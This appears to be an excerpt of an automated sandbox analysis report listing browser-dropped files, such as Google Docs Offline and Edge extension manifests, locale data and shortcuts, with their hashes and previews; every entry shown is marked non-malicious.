                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):1205
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.50367724745418
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):843
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.76581227215314
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):912
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.65963951143349
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:YlMBKqLnI7EgBLWFQbTQIF+j4h3OadMJzLWnCieqgwLeOvKrCRPE:YlMBKqjI7EQOQb0Pj4heOWqeyaBrMPE
                                                                                                                                                                                                                                                                                                  MD5:71F916A64F98B6D1B5D1F62D297FDEC1
                                                                                                                                                                                                                                                                                                  SHA1:9386E8F723C3F42DA5B3F7E0B9970D2664EA0BAA
                                                                                                                                                                                                                                                                                                  SHA-256:EC78DDD4CCF32B5D76EC701A20167C3FBD146D79A505E4FB0421FC1E5CF4AA63
                                                                                                                                                                                                                                                                                                  SHA-512:30FA4E02120AF1BE6E7CC7DBB15FAE5D50825BD6B3CF28EF21D2F2E217B14AF5B76CFCC165685C3EDC1D09536BFCB10CA07E1E2CC0DA891CEC05E19394AD7144
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"DALA ENTSHA"},"explanationofflinedisabled":{"message":"Awuxhunyiwe ku-inthanethi. Ukuze usebenzise i-Google Amadokhumenti ngaphandle koxhumano lwe-inthanethi, iya kokuthi izilungiselelo ekhasini lasekhaya le-Google Amadokhumenti bese uvula ukuvumelanisa okungaxhunyiwe ku-inthanethi ngesikhathi esilandelayo lapho uxhunywe ku-inthanethi."},"explanationofflineenabled":{"message":"Awuxhunyiwe ku-inthanethi, kodwa usangakwazi ukuhlela amafayela atholakalayo noma udale amasha."},"extdesc":{"message":"Hlela, dala, futhi ubuke amadokhumenti akho, amaspredishithi, namaphrezentheshini \u2014 konke ngaphandle kokufinyelela kwe-inthanethi."},"extname":{"message":"I-Google Amadokhumenti engaxhumekile ku-intanethi"},"learnmore":{"message":"Funda kabanzi"},"popuphelptext":{"message":"Bhala, hlela, futhi hlanganyela noma yikuphi lapho okhona, unalo noma ungenalo uxhumano lwe-inthanethi."}}.
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):11406
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.745845607168024
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:192:RBG1G1UPkUj/86Op//Ier/2nsNLJtwg+K8HNnswuH+svyw6r+cgTSJJT4LGkt:m8IEI4u8/EgG4
                                                                                                                                                                                                                                                                                                  MD5:0A68C9539A188B8BB4F9573F2F2321D6
                                                                                                                                                                                                                                                                                                  SHA1:E0F814FA4DCC04EDC6A5D39CBC1038979E88F0E5
                                                                                                                                                                                                                                                                                                  SHA-256:39E6C25D096AFD156644F07586D85E37F1F7B3DA9B636471E8D15CEB14DB184F
                                                                                                                                                                                                                                                                                                  SHA-512:13F133C173C6622B8E1B6F86A551CBC5B0B2446B3CF96E4AE8CA2646009B99E4A360C2DB3168CB94A488FAEBD215003DFA60D10150B7A85B5F8919900BD01CCC
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:[{"description":"treehash per file","signed_content":{"payload":"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
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):854
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.284628987131403
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:12:ont+QByTwnnGNcMbyWM+Q9TZldnnnGGxlF/S0WOtUL0M0r:vOrGe4dDCVGOjWJ0nr
                                                                                                                                                                                                                                                                                                  MD5:4EC1DF2DA46182103D2FFC3B92D20CA5
                                                                                                                                                                                                                                                                                                  SHA1:FB9D1BA3710CF31A87165317C6EDC110E98994CE
                                                                                                                                                                                                                                                                                                  SHA-256:6C69CE0FE6FAB14F1990A320D704FEE362C175C00EB6C9224AA6F41108918CA6
                                                                                                                                                                                                                                                                                                  SHA-512:939D81E6A82B10FF73A35C931052D8D53D42D915E526665079EEB4820DF4D70F1C6AEBAB70B59519A0014A48514833FEFD687D5A3ED1B06482223A168292105D
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{. "type": "object",. "properties": {. "allowedDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Allow users to enable Docs offline for the specified managed domains.",. "description": "Users on managed devices will be able to enable docs offline if they are part of the specified managed domains.". },. "autoEnabledDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Auto enable Docs offline for the specified managed domains in certain eligible situations.",. "description": "Users on managed devices, in certain eligible situations, will be able to automatically access and edit recent files offline for the managed domains set in this property. They can still disable it from Drive settings.". }. }.}.
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):2525
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.417954053901
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HEZ4WPoolELb/KxktGw3VwELb/4iL2QDkUpvdz1xxy/Atj17x9yiVvQe:WdP5aLTKQGwlTLT4oRvvxs/AP7xgiVb
                                                                                                                                                                                                                                                                                                  MD5:5E425DC36364927B1348F6C48B68C948
                                                                                                                                                                                                                                                                                                  SHA1:9E411B88453DEF3F7CFCB3EAA543C69AD832B82F
                                                                                                                                                                                                                                                                                                  SHA-256:32D9C8DE71A40D71FC61AD52AA07E809D07DF57A2F4F7855E8FC300F87FFC642
                                                                                                                                                                                                                                                                                                  SHA-512:C19217B9AF82C1EE1015D4DFC4234A5CE0A4E482430455ABAAFAE3F9C8AE0F7E5D2ED7727502760F1B0656F0A079CB23B132188AE425E001802738A91D8C5D79
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "author": {.. "email": "docs-hosted-app-own@google.com".. },.. "background": {.. "service_worker": "service_worker_bin_prod.js".. },.. "content_capabilities": {.. "matches": [ "https://docs.google.com/*", "https://drive.google.com/*", "https://drive-autopush.corp.google.com/*", "https://drive-daily-0.corp.google.com/*", "https://drive-daily-1.corp.google.com/*", "https://drive-daily-2.corp.google.com/*", "https://drive-daily-3.corp.google.com/*", "https://drive-daily-4.corp.google.com/*", "https://drive-daily-5.corp.google.com/*", "https://drive-daily-6.corp.google.com/*", "https://drive-preprod.corp.google.com/*", "https://drive-staging.corp.google.com/*" ],.. "permissions": [ "clipboardRead", "clipboardWrite", "unlimitedStorage" ].. },.. "content_security_policy": {.. "extension_pages": "script-src 'self'; object-src 'self'".. },.. "default_locale": "en_US",.. "description": "__MSG_extDesc__",.. "externally_connectable": {.. "ma
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):97
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.862433271815736
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:PouV7uJL5XL/oGLvLAAJR90bZNGXIL0Hac4NGb:hxuJL5XsOv0EmNV4HX4Qb
                                                                                                                                                                                                                                                                                                  MD5:B747B5922A0BC74BBF0A9BC59DF7685F
                                                                                                                                                                                                                                                                                                  SHA1:7BF124B0BE8EE2CFCD2506C1C6FFC74D1650108C
                                                                                                                                                                                                                                                                                                  SHA-256:B9FA2D52A4FFABB438B56184131B893B04655B01F336066415D4FE839EFE64E7
                                                                                                                                                                                                                                                                                                  SHA-512:7567761BE4054FCB31885E16D119CD4E419A423FFB83C3B3ED80BFBF64E78A73C2E97AAE4E24AB25486CD1E43877842DB0836DB58FBFBCEF495BC53F9B2A20EC
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:<!DOCTYPE html>.<html>.<body>. <script src="offscreendocument_main.js"></script>.</body>.</html>
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (4882)
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):122218
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.439997574414675
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:1536:naCwKqAbNBbV9HGsR43l9S6w3xu7gXMgaG0R6RxNbF4Ki3wqP+PrQY2PEtb1B:Jfcs1XMr2zbF4Ki+PkPEfB
                                                                                                                                                                                                                                                                                                  MD5:67C4451398037DD1C497A1EA98227630
                                                                                                                                                                                                                                                                                                  SHA1:F5BB00D46BCAB5A8A02E68E4895AEB6859B74AA8
                                                                                                                                                                                                                                                                                                  SHA-256:59123D5A34A319791E90391FC55F0F4B8F5ABB6DB67353609DB25ACC3E99C166
                                                                                                                                                                                                                                                                                                  SHA-512:17F35CE2A11C26168CC52C4AE2BEC548A1AEB1B1F9CB3475B0552BDE71CFE94C5C0C4F3F51267EF7C7D9B0E01E1D1259F48968E70EE1E905471BA0C76ECA81EA
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:'use strict';function aa(){return function(a){return a}}function k(){return function(){}}function n(a){return function(){return this[a]}}function ba(a){return function(){return a}}var q;function ca(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var da=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function ea(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var ha=ea(this);function r(a,b){if(b)a:{var c=ha;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&da(c,a,{configurable:!0,writable:!0,value:b})}}.r("Symbol",function(a){function b(f){if(this instanceof b)throw new T
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):291
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.65176400421739
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:6:2LGX86tj66rU8j6D3bWq2un/XBtzHrH9Mnj63LK603:2Q8KVqb2u/Rt3Onj1
                                                                                                                                                                                                                                                                                                  MD5:3AB0CD0F493B1B185B42AD38AE2DD572
                                                                                                                                                                                                                                                                                                  SHA1:079B79C2ED6F67B5A5BD9BC8C85801F96B1B0F4B
                                                                                                                                                                                                                                                                                                  SHA-256:73E3888CCBC8E0425C3D2F8D1E6A7211F7910800EEDE7B1E23AD43D3B21173F7
                                                                                                                                                                                                                                                                                                  SHA-512:32F9DB54654F29F39D49F7A24A1FC800DBC0D4A8A1BAB2369C6F9799BC6ADE54962EFF6010EF6D6419AE51D5B53EC4B26B6E2CDD98DEF7CC0D2ADC3A865F37D3
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:(function(){window._docs_chrome_extension_exists=!0;window._docs_chrome_extension_features_version=2;window._docs_chrome_extension_permissions="alarms clipboardRead clipboardWrite storage unlimitedStorage offscreen".split(" ");window._docs_chrome_extension_manifest_version=3;}).call(this);.
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (4882)
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):130866
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.425065147784983
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:1536:zKjBw7l0GLFqjLmqoTquyBQCGLu5fJDX5pwPGFSS2IH0dKxQ5SbNyO+DrxZlkaY8:XYQi3DX5WkfH0dKxdboDrNOdor
                                                                                                                                                                                                                                                                                                  MD5:1A8A1F4E5BA291867D4FA8EF94243EFA
                                                                                                                                                                                                                                                                                                  SHA1:B25076D2AE85BD5E4ABA935F758D5122CCB82C36
                                                                                                                                                                                                                                                                                                  SHA-256:441385D13C00F82ABEEDD56EC9A7B2FE90658C9AACB7824DEA47BB46440C335B
                                                                                                                                                                                                                                                                                                  SHA-512:F05668098B11C60D0DDC3555FCB51C3868BB07BA20597358EBA3FEED91E59F122E07ECB0BD06743461DFFF8981E3E75A53217713ABF2A78FB4F955641F63537C
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):1753
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.8889033066924155
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:48:Pxpr7Xka2NXDpfsBJODI19Kg1JqcJW9O//JE3ZBDcpu/x:L3XgNSz9/4kIO3u3Xgpq
                                                                                                                                                                                                                                                                                                  MD5:738E757B92939B24CDBBD0EFC2601315
                                                                                                                                                                                                                                                                                                  SHA1:77058CBAFA625AAFBEA867052136C11AD3332143
                                                                                                                                                                                                                                                                                                  SHA-256:D23B2BA94BA22BBB681E6362AE5870ACD8A3280FA9E7241B86A9E12982968947
                                                                                                                                                                                                                                                                                                  SHA-512:DCA3E12DD5A9F1802DB6D11B009FCE2B787E79B9F730094367C9F26D1D87AF1EA072FF5B10888648FB1231DD83475CF45594BB0C9915B655EE363A3127A5FFC2
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:Unicode text, UTF-8 text, with very long lines (8031), with no line terminators
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):9815
                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.1716321262973315
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3zEScQZBMX:+ThBVq3npozftROQIyVfjRZGB365Ey97
                                                                                                                                                                                                                                                                                                  MD5:3D20584F7F6C8EAC79E17CCA4207FB79
                                                                                                                                                                                                                                                                                                  SHA1:3C16DCC27AE52431C8CDD92FBAAB0341524D3092
                                                                                                                                                                                                                                                                                                  SHA-256:0D40A5153CB66B5BDE64906CA3AE750494098F68AD0B4D091256939EEA243643
                                                                                                                                                                                                                                                                                                  SHA-512:315D1B4CC2E70C72D7EB7D51E0F304F6E64AC13AE301FD2E46D585243A6C936B2AD35A0964745D291AE9B317C316A29760B9B9782C88CC6A68599DB531F87D59
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:Unicode text, UTF-8 text, with very long lines (8604), with no line terminators
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):10388
                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.174387413738973
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3EbmE1F4fn:+ThBVq3npozftROQIyVfjRZGB365Ey9+
                                                                                                                                                                                                                                                                                                  MD5:3DE1E7D989C232FC1B58F4E32DE15D64
                                                                                                                                                                                                                                                                                                  SHA1:42B152EA7E7F31A964914F344543B8BF14B5F558
                                                                                                                                                                                                                                                                                                  SHA-256:D4AA4602A1590A4B8A1BCE8B8D670264C9FB532ADC97A72BC10C43343650385A
                                                                                                                                                                                                                                                                                                  SHA-512:177E5BDF3A1149B0229B6297BAF7B122602F7BD753F96AA41CCF2D15B2BCF6AF368A39BB20336CCCE121645EC097F6BEDB94666C74ACB6174EB728FBFC43BC2A
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):962
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.698567446030411
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:1Hg9+D3DRnbuF2+sUrzUu+Y9VwE+Fg41T1O:NBqY+6E+F7JO
                                                                                                                                                                                                                                                                                                  MD5:E805E9E69FD6ECDCA65136957B1FB3BE
                                                                                                                                                                                                                                                                                                  SHA1:2356F60884130C86A45D4B232A26062C7830E622
                                                                                                                                                                                                                                                                                                  SHA-256:5694C91F7D165C6F25DAF0825C18B373B0A81EA122C89DA60438CD487455FD6A
                                                                                                                                                                                                                                                                                                  SHA-512:049662EF470D2B9E030A06006894041AE6F787449E4AB1FBF4959ADCB88C6BB87A957490212697815BB3627763C01B7B243CF4E3C4620173A95795884D998A75
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "content_scripts": [ {.. "js": [ "content.js" ],.. "matches": [ "https://chrome.google.com/webstore/*" ].. }, {.. "js": [ "content_new.js" ],.. "matches": [ "https://chromewebstore.google.com/*" ].. } ],.. "description": "Edge relevant text changes on select websites to improve user experience and precisely surfaces the action they want to take.",.. "key": "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu06p2Mjoy6yJDUUjCe8Hnqvtmjll73XqcbylxFZZWe+MCEAEK+1D0Nxrp0+IuWJL02CU3jbuR5KrJYoezA36M1oSGY5lIF/9NhXWEx5GrosxcBjxqEsdWv/eDoOOEbIvIO0ziMv7T1SUnmAA07wwq8DXWYuwlkZU/PA0Mxx0aNZ5+QyMfYqRmMpwxkwPG8gyU7kmacxgCY1v7PmmZo1vSIEOBYrxl064w5Q6s/dpalSJM9qeRnvRMLsszGY/J2bjQ1F0O2JfIlBjCOUg/89+U8ZJ1mObOFrKO4um8QnenXtH0WGmsvb5qBNrvbWNPuFgr2+w5JYlpSQ+O8zUCb8QZwIDAQAB",.. "manifest_version": 3,.. "name": "Edge relevant text changes",.. "update_url": "https://edge.microsoft.com/extensionwebstorebase/v1/crx",.. "version": "1.2.1"..}..
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):11185
                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.951995436832936
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                                                                                                                                                                                                                                                                                  MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                                                                                                                                                                                                                                                                                  SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                                                                                                                                                                                                                                                                                  SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                                                                                                                                                                                                                                                                                  SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Dec 27 05:00:58 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):2677
                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.978396183624148
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:48:8LdbTDvVH3idAKZdA19ehwiZUklqehv6y+3:8tXrpy
                                                                                                                                                                                                                                                                                                  MD5:3C4C90627172CA261B292B43DBE2C39E
                                                                                                                                                                                                                                                                                                  SHA1:2D06E8DF94364152DD2B01FC4030D6C27CEDD759
                                                                                                                                                                                                                                                                                                  SHA-256:82A0816A552A366DF22C09EA4CF22A034F6B90E571A48FC34D7273F7769C4577
                                                                                                                                                                                                                                                                                                  SHA-512:8E57B466D21A8D57B5E5E1E44F172131323B95A6B8CCFE66DCEB81E878BD78E2B2D0B3E7B63334E9923D85F512D1B6EB4FF116E36E55ECEA306E38D8DE318E61
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Dec 27 05:00:58 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):2679
                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.9937730951822874
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:48:8fdbTDvVH3idAKZdA1weh/iZUkAQkqehw6y+2:8JXZ9QAy
                                                                                                                                                                                                                                                                                                  MD5:76B625A60AFE9DBAEA2AE7D4237AA9B3
                                                                                                                                                                                                                                                                                                  SHA1:45F186330583ADB10679E1F1C4A87F7837EEFFF4
                                                                                                                                                                                                                                                                                                  SHA-256:A891DC1208A00749A31375BAA17691CBDFB02998544681C5D928BACF265A3191
                                                                                                                                                                                                                                                                                                  SHA-512:F7A5D1E77F0A2D7F131755E7849D4E1916C92A7B2D76994EDEB0E121C151676B3D1D58642E77963BFCA7577410A8827651C492DE816407B5BDD83A8E543964DE
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 4 12:54:07 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):2693
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.005720216456517
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:48:8xIdbTDvsH3idAKZdA14tseh7sFiZUkmgqeh7s66y+BX:8xUXan9y
                                                                                                                                                                                                                                                                                                  MD5:619165E975505AB5F3A1EBBF82022B42
                                                                                                                                                                                                                                                                                                  SHA1:C00B00FD0FA25C9A7BC0B84953E5A8B9BB9361F5
                                                                                                                                                                                                                                                                                                  SHA-256:778294434850506EDCE0120250FC19CD822D61023A6F941FCA1F781915C2E667
                                                                                                                                                                                                                                                                                                  SHA-512:30D2C91B090AC802ABA672A3AB3E7A10BE94471EA7E2B1525B83D8773DC3B42A2EB76D11894ABD0F17E3A7422755886ED216B082AB8DABB5E4DFE0AF777D9A8C
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Dec 27 05:00:58 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):2681
                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.9918110868213175
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:48:87dbTDvVH3idAKZdA1vehDiZUkwqeh86y+R:8dX6Hy
                                                                                                                                                                                                                                                                                                  MD5:FE5300224368DE208C1918CE96746D54
                                                                                                                                                                                                                                                                                                  SHA1:9ADCC322264B46344AEF2F2314BA3FE68571D81A
                                                                                                                                                                                                                                                                                                  SHA-256:8C373F92C3DA0A12656E0885F685A7027D3B6DCDA5EF353967E6BAFBF9077192
                                                                                                                                                                                                                                                                                                  SHA-512:947A641FA8AA5954062ECD41B4506E456747A33A9D8FAA15F75A448F960A32039ED0D409E830AB1B465DD0817BDB0078B142955E4D4B965F2F7DC0C9D25B09E2
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Dec 27 05:00:58 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):2681
                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.981231175169598
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:48:8sdbTDvVH3idAKZdA1hehBiZUk1W1qeh+6y+C:8wX69jy
                                                                                                                                                                                                                                                                                                  MD5:B88A19219BEE3ACF5C072C5D1E54C600
                                                                                                                                                                                                                                                                                                  SHA1:DFED3D5A6D7EDDD0218F4C324B91D9A246732B67
                                                                                                                                                                                                                                                                                                  SHA-256:63FCB9FA63086EFF0C4552A99744F59E7A71F3E02A079A32CA4879CCB97AC688
                                                                                                                                                                                                                                                                                                  SHA-512:46379534299C1FFDEB4DD9774D3D1C82E6E64E6837115FD4C4276BC5C8BD22B65F6BD030D62663EC89DB26600FCB2C1A6693CCC3555507BA561B02BDCED122B7
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Dec 27 05:00:58 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):2683
                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.9905578608402874
